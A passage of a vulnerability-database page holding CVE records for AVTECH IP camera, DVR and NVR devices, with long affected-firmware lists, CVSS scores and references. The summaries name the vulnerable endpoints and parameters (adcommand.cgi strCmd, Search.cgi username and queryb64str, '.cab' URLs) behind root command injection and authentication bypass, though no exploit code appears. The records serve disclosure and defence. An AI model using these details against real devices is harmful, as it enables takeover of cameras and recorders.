"version": "1023-1014-1017-1002-FFFF"
},
{
"status": "affected",
"version": "1025-1006-1013-1011"
},
{
"status": "affected",
"version": "1025-1008-1013-1008"
},
{
"status": "affected",
"version": "1025-1014-1013-1009"
},
{
"status": "affected",
"version": "1027-1008-1012-1008"
},
{
"status": "affected",
"version": "1027-1008-1013-1008"
},
{
"status": "affected",
"version": "1027-1014-1015-1009"
},
{
"status": "affected",
"version": "1027L-1006L-1015L-1009L"
},
{
"status": "affected",
"version": "1028-1007-1014-1012"
},
{
"status": "affected",
"version": "1029-1007-1014-1008"
},
{
"status": "affected",
"version": "1030-1007-1014-1012"
},
{
"status": "affected",
"version": "1030-1008-1014-1008"
},
{
"status": "affected",
"version": "1031-1007-1015-1012"
},
{
"status": "affected",
"version": "1032-1007-1015-1008"
},
{
"status": "affected",
"version": "1032k-1007k-1015k-1008k"
},
{
"status": "affected",
"version": "1036r-1008r-1016r-1009r"
},
{
"status": "affected",
"version": "1037-1008-1017-1009"
},
{
"status": "affected",
"version": "S749-S749-S749-S749"
},
{
"status": "affected",
"version": "S820-S820-S820-S820"
},
{
"status": "affected",
"version": "S823-S823-S823-S823"
},
{
"status": "affected",
"version": "S855-S855-S855-S855"
},
{
"status": "affected",
"version": "S914V-S914V-S914V-S914V"
},
{
"status": "affected",
"version": "S968-S968-S968-S968"
},
{
"status": "affected",
"version": "S984-S984-S984-S984"
},
{
"status": "affected",
"version": "T717-T717-T717-T717"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An OS command injection vulnerability exists in AVTECH DVR, NVR, and IP camera devices within the \u003ccode\u003eadcommand.cgi\u003c/code\u003e endpoint, which interfaces with the ActionD daemon. Authenticated users can invoke the \u003ccode\u003eDoShellCmd\u003c/code\u003e operation, passing arbitrary input via the \u003ccode\u003estrCmd\u003c/code\u003e parameter. This input is executed directly by the system shell without sanitation allowing attackers to execute commands as the root user."
}
],
"value": "An OS command injection vulnerability exists in AVTECH DVR, NVR, and IP camera devices within the adcommand.cgi endpoint, which interfaces with the ActionD daemon. Authenticated users can invoke the DoShellCmd operation, passing arbitrary input via the strCmd parameter. This input is executed directly by the system shell without sanitation allowing attackers to execute commands as the root user."
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:16.960Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34055",
"datePublished": "2025-07-01T14:46:38.848Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:16.960Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34054 (GCVE-0-2025-34054)
Vulnerability from nvd – Published: 2025-07-01 14:46 – Updated: 2026-04-07 14:09 X_Known Exploited Vulnerability
VLAI
KEVIntel
Title
AVTECH IP camera, DVR, and NVR Devices Unauthenticated Command Injection
Summary
An unauthenticated command injection vulnerability exists in AVTECH DVR devices via Search.cgi?action=cgi_query. The use of wget without input sanitization allows attackers to inject shell commands through the username or queryb64str parameters, executing commands as root. Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-04 UTC.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
1008-1002-1005-1000
Affected: 1009-1003-1006-1001 Affected: 1009Y-1003Y-1006Y-1001Y Affected: 1010-1004-1007-1001 Affected: 1011-1005-1008-1002 Affected: 1014-1005-1009-1002 Affected: 1015-1006-1010-1003 Affected: 1016-1007-1011-1003 Affected: 1017-1008-1012-1002 Affected: 1017Y-1008Y-1012Y-1002Y Affected: 1018-1008-1012-1004 Affected: 1019-1009-1013-1003 Affected: 1019c-1012c-1014c-1001c-FFFF Affected: 1022-1014-1016-1002-FFFF Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1014-1017-1002-FFFF |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34054",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:46:33.820743Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:46:40.272Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Search.cgi",
"username parameter",
"queryb64str"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1008-1002-1005-1000"
},
{
"status": "affected",
"version": "1009-1003-1006-1001"
},
{
"status": "affected",
"version": "1009Y-1003Y-1006Y-1001Y"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1011-1005-1008-1002"
},
{
"status": "affected",
"version": "1014-1005-1009-1002"
},
{
"status": "affected",
"version": "1015-1006-1010-1003"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1017-1008-1012-1002"
},
{
"status": "affected",
"version": "1017Y-1008Y-1012Y-1002Y"
},
{
"status": "affected",
"version": "1018-1008-1012-1004"
},
{
"status": "affected",
"version": "1019-1009-1013-1003"
},
{
"status": "affected",
"version": "1019c-1012c-1014c-1001c-FFFF"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1014-1017-1002-FFFF"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An unauthenticated command injection vulnerability exists in AVTECH DVR devices via Search.cgi?action=cgi_query. The use of wget without input sanitization allows attackers to inject shell commands through the username or queryb64str parameters, executing commands as root.\u0026nbsp;Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-04 UTC."
}
],
"value": "An unauthenticated command injection vulnerability exists in AVTECH DVR devices via Search.cgi?action=cgi_query. The use of wget without input sanitization allows attackers to inject shell commands through the username or queryb64str parameters, executing commands as root.\u00a0Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-04 UTC."
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:16.220Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"tags": [
"x_known-exploited-vulnerability"
],
"title": "AVTECH IP camera, DVR, and NVR Devices Unauthenticated Command Injection",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34054",
"datePublished": "2025-07-01T14:46:00.832Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:16.220Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34053 (GCVE-0-2025-34053)
Vulnerability from nvd – Published: 2025-07-01 14:45 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via .cab Path Manipulation
Summary
An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices’ streamd web server. The strstr() function is used to identify ".cab" requests, allowing any URL containing ".cab" to bypass authentication and access protected endpoints.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-290 - Authentication Bypass by Spoofing
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR devices |
Affected:
1000-1000-1000-1000
Affected: 1000C-1000C-1000C-1000C Affected: 1001-1000-1000-1000 Affected: 1001-1001-1000-1000 Affected: 1002-1000-1000-1000 Affected: 1002-1002-1000-1002 Affected: 1002D-1000D-1000D-1000D Affected: 1003-1000-1000-1001 Affected: 1003-1001-1001-1000 Affected: 1003-1002-1001-1000 Affected: 1004-1000-1000-1000 Affected: 1004-1001-1001-1001 Affected: 1004-1003-1001-1002 Affected: 1004-1003-1002-1001 Affected: 1004A-1001A-1002A-1000A Affected: 1005-1002-1001-1002 Affected: 1005-1003-1001-1002 Affected: 1005-1004-1002-1001 Affected: 1005A-1001A-1002A-1001A Affected: 1005D-1001D-1002D-1001D Affected: 1006-1002-1001-1002 Affected: 1006-1004-1003-1001 Affected: 1007-1001-1003-1001 Affected: 1007-1001-1004-1003 Affected: 1007-1002-1001-1003 Affected: 1007-1002-1003-1002 Affected: 1007-1004-1003-1001 Affected: 1008-1001-1003-1002 Affected: 1008-1004-1004-1001 Affected: 1008D-1003D-1004D-1002D Affected: 1008J-1004J-1004J-1001J Affected: 1009-1001-1004-1001 Affected: 1009-1002-1005-1003 Affected: 1009-1003-1005-1002 Affected: 1010-1001-1004-1001 Affected: 1010-1001-1004-1002 Affected: 1010-1003-1005-1002 Affected: 1010-1003-1006-1003 Affected: 1010-1003-1006-1004 Affected: 1010-1004-1007-1001 Affected: 1010J-1001J-1004J-1001J Affected: 1010N-1003N-1005N-1002N Affected: 1011-1001-1002A-1002 Affected: 1011-1001-1002D-1002 Affected: 1011-1001-1003-1002 Affected: 1011-1001-1004-1002 Affected: 1011-1001-1005-1002 Affected: 1011-1004-1005-1002 Affected: 1012-1001-1005-1002 Affected: 1012-1001-1005-1003 Affected: 1012-1001-1005PO-1002 Affected: 1012-1003-1007-1002 Affected: 1012-1003-1007-1004 Affected: 1013-1001-1005-1003 Affected: 1013-1002-1006-1002 Affected: 1013-1003-1008-1003 Affected: 1013-1004-1008-1004 Affected: 1013-1005-1005-1002 Affected: 1013-1005-1007-1002 Affected: 1013K-1005K-1007PO-1002K Affected: 1014-1002-1006-1002 Affected: 1014-1002-1006-1003 Affected: 1014-1003-1008-1003 Affected: 1014-1005-1008-1002 Affected: 1014B-1002B-1006B-1002B Affected: 1015-1001-1006-1003 Affected: 1015-1002-1006-1003 Affected: 1015-1002-1007-1002 Affected: 1015-1003-1008-1003 Affected: 1015-1005-1009-1004 Affected: 1015-1006-1004-1002 Affected: 1015-1006-1005-1002 Affected: 1015-1006-1008-1002 Affected: 1015C-1004C-1003C-1005C Affected: 1015K-1006K-1008PO-1002K Affected: 1016-1002-1007-1002 Affected: 1016-1006-1013-1002 Affected: 1016-1007-1009-1003 Affected: 1016-1007-1011-1003 Affected: 1017-1002-1007-1003 Affected: 1017-1003-1007-1003 Affected: 1017-1003-1009-1003 Affected: 1017-1005-1004-1005 Affected: 1017-1006-1013-1002 Affected: 1017-1013-1014-1005 Affected: 1018-1003-1005-1004 Affected: 1018-1003-1008-1003 Affected: 1018-1003-1008-1004 Affected: 1018-1003-1008PO-1003 Affected: 1018-1004-1005-1005 Affected: 1018-1007-1009-1003 Affected: 1018-1012-1011-1010 Affected: 1019-1004-1006-1005 Affected: 1019-1007-1009-1003 Affected: 1020-1003-1008-1003 Affected: 1020-1003-1008-1004 Affected: 1020-1004-1007-1006 Affected: 1020-1007-1008-1003 Affected: 1020-1007-1009-1003 Affected: 1021-1003-1008-1003 Affected: 1021-1003-1008-1004 Affected: 1021-1005-1006-1005 Affected: 1021-1005-1008-1006 Affected: 1021-1006-1015-1002 Affected: 1021-1007-1010-1003 Affected: 1022-1005-1007-1005 Affected: 1022-1005-1009-1007 Affected: 1022-1006-1015-1002 Affected: 1022-1013-1014-1010 Affected: 1022-1014-1016-1002-FFFF Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1005-1008-1006 Affected: 1023-1007-1016-1003 Affected: 1024-1019-1019-1007 Affected: 1025-1006-1010-1007 Affected: 1025-1017-1017-1011 Affected: 1027-1007-1019-1003 Affected: 1027-1021-1021-1008 Affected: 1028-1021-1022-1008 Affected: 1031-1007-1022-1003 Affected: 1032-1022-1024-1008 Affected: 1033-1018-1021-1012 Affected: 1035-1005-1005-1004 Affected: 1035-1005-1005-1005 Affected: 1035-1005-1005-1005P Affected: 1035-1007-1024-1003 Affected: 1035-1024-1025-1008 Affected: 1036-1005-1006-1005 Affected: 1036-1007-1024-1003 Affected: 1036-1014-1016-1016 Affected: 1037-1024-1027-1008 Affected: 1037-1025-1027-1008 Affected: 1038-1021-1024-1012 Affected: 1038-1021-1024-1012-A5 Affected: 1038-1025-1028-1008 Affected: 1039-1005-1008-1004 Affected: 1039-1005-1008-1005 Affected: 1039-1014-1017-1016 Affected: 1039D-1014D-1017D-1016D Affected: 1040-1026-1029-1008 Affected: 1041-1005-1009-1005 Affected: 1042-1026-1030-1008 Affected: 1044-1026-1030-1008 Affected: 1044-1026-1031-1008 Affected: 1045-1015-1020-1018 Affected: 1046-1027-1032-1008 Affected: 1047-1027-1031-1008 Affected: 1049-1027-1033-1008 Affected: 1050-1027-1034-1008 Affected: 1050-1027-1036-1008 Affected: 1051-1027-1035-1008 Affected: 1051CZ-1028-1037-1008 Affected: 1052-1027-1034-1008 Affected: 1052-1028-1038-1008 Affected: 1052A-1028-1038A-1008 Affected: 1054-1027-1036-1008 Affected: 1054-1028-1036-1008 Affected: 1055-1028-1036-1008 Affected: 1056-1028-1037-1008 Affected: 1058-1028-1039-1008 Affected: 1062-1028-1041-1008 Affected: 1065-1029-1043-1008 Affected: 1068-1029-1043-1008 Affected: 1069-1029-1043-1008 Affected: 1071-1029-1044-1008 Affected: 1077-1017-1035-1007 Affected: 1077-1017-1035-1007-A6 Affected: 1077-1017-1035-1007-D4 Affected: 1077-1017-1035-1007-D705FF Affected: 1078-1017-1036-1007 Affected: 1078-1017-1036-1007-A6 Affected: 1078-1017-1036-1007-D707FF Affected: 1079-1017-1037-1007 Affected: 1079-1017-1037-1007-D4 Affected: 1W77-1W17-1W35-1W07-A6 Affected: A077-1017-A035-1007 Affected: A077-1017-A035-1007-A6 Affected: A1035-1024-A1025-1008 Affected: A1038-1025-A1028-1008-D4 Affected: S681-S681-S681-S681 Affected: S749-S749-S749-S749 Affected: S818-S818-S818-S818 Affected: S820-S820-S820-S820 Affected: S823-S823-S823-S823 Affected: S914V-S914V-S914V-S914V Affected: S984-S984-S984-S984 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34053",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:46:03.365792Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:46:09.474Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"streamd web server",
"request URL parameter"
],
"product": "IP camera, DVR, and NVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1000-1000-1000-1000"
},
{
"status": "affected",
"version": "1000C-1000C-1000C-1000C"
},
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1001-1001-1000-1000"
},
{
"status": "affected",
"version": "1002-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1002-1000-1002"
},
{
"status": "affected",
"version": "1002D-1000D-1000D-1000D"
},
{
"status": "affected",
"version": "1003-1000-1000-1001"
},
{
"status": "affected",
"version": "1003-1001-1001-1000"
},
{
"status": "affected",
"version": "1003-1002-1001-1000"
},
{
"status": "affected",
"version": "1004-1000-1000-1000"
},
{
"status": "affected",
"version": "1004-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1003-1001-1002"
},
{
"status": "affected",
"version": "1004-1003-1002-1001"
},
{
"status": "affected",
"version": "1004A-1001A-1002A-1000A"
},
{
"status": "affected",
"version": "1005-1002-1001-1002"
},
{
"status": "affected",
"version": "1005-1003-1001-1002"
},
{
"status": "affected",
"version": "1005-1004-1002-1001"
},
{
"status": "affected",
"version": "1005A-1001A-1002A-1001A"
},
{
"status": "affected",
"version": "1005D-1001D-1002D-1001D"
},
{
"status": "affected",
"version": "1006-1002-1001-1002"
},
{
"status": "affected",
"version": "1006-1004-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1004-1003"
},
{
"status": "affected",
"version": "1007-1002-1001-1003"
},
{
"status": "affected",
"version": "1007-1002-1003-1002"
},
{
"status": "affected",
"version": "1007-1004-1003-1001"
},
{
"status": "affected",
"version": "1008-1001-1003-1002"
},
{
"status": "affected",
"version": "1008-1004-1004-1001"
},
{
"status": "affected",
"version": "1008D-1003D-1004D-1002D"
},
{
"status": "affected",
"version": "1008J-1004J-1004J-1001J"
},
{
"status": "affected",
"version": "1009-1001-1004-1001"
},
{
"status": "affected",
"version": "1009-1002-1005-1003"
},
{
"status": "affected",
"version": "1009-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1001-1004-1001"
},
{
"status": "affected",
"version": "1010-1001-1004-1002"
},
{
"status": "affected",
"version": "1010-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1003-1006-1003"
},
{
"status": "affected",
"version": "1010-1003-1006-1004"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010J-1001J-1004J-1001J"
},
{
"status": "affected",
"version": "1010N-1003N-1005N-1002N"
},
{
"status": "affected",
"version": "1011-1001-1002A-1002"
},
{
"status": "affected",
"version": "1011-1001-1002D-1002"
},
{
"status": "affected",
"version": "1011-1001-1003-1002"
},
{
"status": "affected",
"version": "1011-1001-1004-1002"
},
{
"status": "affected",
"version": "1011-1001-1005-1002"
},
{
"status": "affected",
"version": "1011-1004-1005-1002"
},
{
"status": "affected",
"version": "1012-1001-1005-1002"
},
{
"status": "affected",
"version": "1012-1001-1005-1003"
},
{
"status": "affected",
"version": "1012-1001-1005PO-1002"
},
{
"status": "affected",
"version": "1012-1003-1007-1002"
},
{
"status": "affected",
"version": "1012-1003-1007-1004"
},
{
"status": "affected",
"version": "1013-1001-1005-1003"
},
{
"status": "affected",
"version": "1013-1002-1006-1002"
},
{
"status": "affected",
"version": "1013-1003-1008-1003"
},
{
"status": "affected",
"version": "1013-1004-1008-1004"
},
{
"status": "affected",
"version": "1013-1005-1005-1002"
},
{
"status": "affected",
"version": "1013-1005-1007-1002"
},
{
"status": "affected",
"version": "1013K-1005K-1007PO-1002K"
},
{
"status": "affected",
"version": "1014-1002-1006-1002"
},
{
"status": "affected",
"version": "1014-1002-1006-1003"
},
{
"status": "affected",
"version": "1014-1003-1008-1003"
},
{
"status": "affected",
"version": "1014-1005-1008-1002"
},
{
"status": "affected",
"version": "1014B-1002B-1006B-1002B"
},
{
"status": "affected",
"version": "1015-1001-1006-1003"
},
{
"status": "affected",
"version": "1015-1002-1006-1003"
},
{
"status": "affected",
"version": "1015-1002-1007-1002"
},
{
"status": "affected",
"version": "1015-1003-1008-1003"
},
{
"status": "affected",
"version": "1015-1005-1009-1004"
},
{
"status": "affected",
"version": "1015-1006-1004-1002"
},
{
"status": "affected",
"version": "1015-1006-1005-1002"
},
{
"status": "affected",
"version": "1015-1006-1008-1002"
},
{
"status": "affected",
"version": "1015C-1004C-1003C-1005C"
},
{
"status": "affected",
"version": "1015K-1006K-1008PO-1002K"
},
{
"status": "affected",
"version": "1016-1002-1007-1002"
},
{
"status": "affected",
"version": "1016-1006-1013-1002"
},
{
"status": "affected",
"version": "1016-1007-1009-1003"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1017-1002-1007-1003"
},
{
"status": "affected",
"version": "1017-1003-1007-1003"
},
{
"status": "affected",
"version": "1017-1003-1009-1003"
},
{
"status": "affected",
"version": "1017-1005-1004-1005"
},
{
"status": "affected",
"version": "1017-1006-1013-1002"
},
{
"status": "affected",
"version": "1017-1013-1014-1005"
},
{
"status": "affected",
"version": "1018-1003-1005-1004"
},
{
"status": "affected",
"version": "1018-1003-1008-1003"
},
{
"status": "affected",
"version": "1018-1003-1008-1004"
},
{
"status": "affected",
"version": "1018-1003-1008PO-1003"
},
{
"status": "affected",
"version": "1018-1004-1005-1005"
},
{
"status": "affected",
"version": "1018-1007-1009-1003"
},
{
"status": "affected",
"version": "1018-1012-1011-1010"
},
{
"status": "affected",
"version": "1019-1004-1006-1005"
},
{
"status": "affected",
"version": "1019-1007-1009-1003"
},
{
"status": "affected",
"version": "1020-1003-1008-1003"
},
{
"status": "affected",
"version": "1020-1003-1008-1004"
},
{
"status": "affected",
"version": "1020-1004-1007-1006"
},
{
"status": "affected",
"version": "1020-1007-1008-1003"
},
{
"status": "affected",
"version": "1020-1007-1009-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1004"
},
{
"status": "affected",
"version": "1021-1005-1006-1005"
},
{
"status": "affected",
"version": "1021-1005-1008-1006"
},
{
"status": "affected",
"version": "1021-1006-1015-1002"
},
{
"status": "affected",
"version": "1021-1007-1010-1003"
},
{
"status": "affected",
"version": "1022-1005-1007-1005"
},
{
"status": "affected",
"version": "1022-1005-1009-1007"
},
{
"status": "affected",
"version": "1022-1006-1015-1002"
},
{
"status": "affected",
"version": "1022-1013-1014-1010"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1005-1008-1006"
},
{
"status": "affected",
"version": "1023-1007-1016-1003"
},
{
"status": "affected",
"version": "1024-1019-1019-1007"
},
{
"status": "affected",
"version": "1025-1006-1010-1007"
},
{
"status": "affected",
"version": "1025-1017-1017-1011"
},
{
"status": "affected",
"version": "1027-1007-1019-1003"
},
{
"status": "affected",
"version": "1027-1021-1021-1008"
},
{
"status": "affected",
"version": "1028-1021-1022-1008"
},
{
"status": "affected",
"version": "1031-1007-1022-1003"
},
{
"status": "affected",
"version": "1032-1022-1024-1008"
},
{
"status": "affected",
"version": "1033-1018-1021-1012"
},
{
"status": "affected",
"version": "1035-1005-1005-1004"
},
{
"status": "affected",
"version": "1035-1005-1005-1005"
},
{
"status": "affected",
"version": "1035-1005-1005-1005P"
},
{
"status": "affected",
"version": "1035-1007-1024-1003"
},
{
"status": "affected",
"version": "1035-1024-1025-1008"
},
{
"status": "affected",
"version": "1036-1005-1006-1005"
},
{
"status": "affected",
"version": "1036-1007-1024-1003"
},
{
"status": "affected",
"version": "1036-1014-1016-1016"
},
{
"status": "affected",
"version": "1037-1024-1027-1008"
},
{
"status": "affected",
"version": "1037-1025-1027-1008"
},
{
"status": "affected",
"version": "1038-1021-1024-1012"
},
{
"status": "affected",
"version": "1038-1021-1024-1012-A5"
},
{
"status": "affected",
"version": "1038-1025-1028-1008"
},
{
"status": "affected",
"version": "1039-1005-1008-1004"
},
{
"status": "affected",
"version": "1039-1005-1008-1005"
},
{
"status": "affected",
"version": "1039-1014-1017-1016"
},
{
"status": "affected",
"version": "1039D-1014D-1017D-1016D"
},
{
"status": "affected",
"version": "1040-1026-1029-1008"
},
{
"status": "affected",
"version": "1041-1005-1009-1005"
},
{
"status": "affected",
"version": "1042-1026-1030-1008"
},
{
"status": "affected",
"version": "1044-1026-1030-1008"
},
{
"status": "affected",
"version": "1044-1026-1031-1008"
},
{
"status": "affected",
"version": "1045-1015-1020-1018"
},
{
"status": "affected",
"version": "1046-1027-1032-1008"
},
{
"status": "affected",
"version": "1047-1027-1031-1008"
},
{
"status": "affected",
"version": "1049-1027-1033-1008"
},
{
"status": "affected",
"version": "1050-1027-1034-1008"
},
{
"status": "affected",
"version": "1050-1027-1036-1008"
},
{
